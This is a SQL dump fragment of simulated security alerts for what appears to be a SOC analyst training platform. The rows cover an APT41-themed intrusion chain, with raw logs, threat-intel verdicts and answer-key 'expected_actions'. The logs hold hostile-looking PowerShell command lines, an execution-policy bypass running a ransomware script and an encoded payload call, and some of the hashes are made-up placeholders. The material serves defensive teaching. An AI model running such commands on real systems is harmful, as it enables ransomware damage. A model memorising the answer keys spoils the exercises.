Management\",\"verdict\":\"internal\",\"details\":\"Corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious software update used in supply chain attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update_v1.23.4.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Filename associated with malicious software update distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(414, 'Suspicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'After gaining access, the attackers deployed a suspicious script to execute a ransomware payload, aiming to encrypt critical business data and demand a ransom. The script was detected running on a critical server.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"edr-20231015-0001\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"script_name\":\"encryptor_v2.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"process_id\":4521,\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\j.doe\\\\Desktop\\\\encryptor_v2.ps1\",\"detected_by\":\"EDR\",\"external_ip\":\"203.0.113.45\",\"malware_family\":\"APT41\"}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encryptor_v2.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Database\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized script executed on high-value server\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Valid user 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(415, 'Persistence Mechanism Activated', 'high', 'SIEM', 'The attackers have implemented persistence mechanisms, such as scheduled tasks and registry modifications, to ensure they can regain access even if initial efforts are disrupted. A suspicious scheduled task and registry key modification were detected on the host machine. This activity aligns with known APT41 tactics.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"scheduled_task\":\"UpdateCheck\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"Updater.exe\",\"action\":\"Task Created\",\"description\":\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\",\"os\":\"Windows 10\"}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious executable used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Updater.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"Executable linked to persistence 
mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in previous suspicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.020Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"scheduled_task\\\":\\\"UpdateCheck\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"filename\\\":\\\"Updater.exe\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\\\",\\\"os\\\":\\\"Windows 10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(416, 'Lateral Movement Detected', 'high', 'User and Entity Behavior Analytics (UEBA)', 'APT41 is utilizing stolen credentials to move laterally across the network, targeting sensitive systems. This activity is characteristic of espionage operations and poses a significant threat to the organization\'s critical infrastructure.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.15\",\"username\":\"jdoe_admin\",\"event_type\":\"lateral_movement\",\"event_description\":\"Suspicious lateral movement detected using stolen credentials\",\"malware_hash\":\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\",\"filename\":\"APT41_Tool.exe\",\"observed_activity\":[{\"action\":\"login_attempt\",\"result\":\"success\",\"target_system\":\"10.0.5.15\"},{\"action\":\"file_access\",\"result\":\"success\",\"file\":\"Sensitive_Data.xlsx\"}]}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"internal\",\"details\":\"Critical system targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"suspicious\",\"details\":\"Potentially compromised account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with APT41 lateral movement 
tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"APT41_Tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDB\",\"verdict\":\"malicious\",\"details\":\"APT41 malicious tool for network penetration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen 
credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen 
credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:19.021Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.15\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"event_description\\\":\\\"Suspicious lateral movement detected using stolen credentials\\\",\\\"malware_hash\\\":\\\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\\\",\\\"filename\\\":\\\"APT41_Tool.exe\\\",\\\"observed_activity\\\":[{\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"target_system\\\":\\\"10.0.5.15\\\"},{\\\"action\\\":\\\"file_access\\\",\\\"result\\\":\\\"success\\\",\\\"file\\\":\\\"Sensitive_Data.xlsx\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(417, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP)', 'In the final stage, the attackers attempt to exfiltrate valuable data to an external server, intending to use it for espionage purposes or to sell on the black market.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.92.220.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"action\":\"blocked\",\"alert_id\":\"DLPA123456\",\"tool_used\":\"CCleaner Supply Chain\",\"severity\":\"High\"}', '2026-01-04 04:11:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration server used by APT41.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in the data exfiltration attempt.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with unauthorized data transfer attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply Chain\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply Chain\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply Chain\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply Chain\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.022Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"185.92.220.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPA123456\\\",\\\"tool_used\\\":\\\"CCleaner Supply 
Chain\\\",\\\"severity\\\":\\\"High\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(418, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'A phishing email was detected originating from a known malicious IP address, targeting employees to harvest credentials. The email contains a suspicious attachment and a link to a phishing site.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"email_subject\":\"Urgent: Account Verification Required\",\"from_address\":\"support@secure-mail.com\",\"to_address\":\"john.doe@company.com\",\"attachment_name\":\"invoice_0923.docx\",\"attachment_hash\":\"3f9d4ff4e12a3e47a9f7b1c256b4c033\",\"phishing_url\":\"http://malicious-verify-login.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36\"}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company employee workstation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f9d4ff4e12a3e47a9f7b1c256b4c033\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected in multiple AV engines\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-verify-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Active phishing site\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"support@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email 
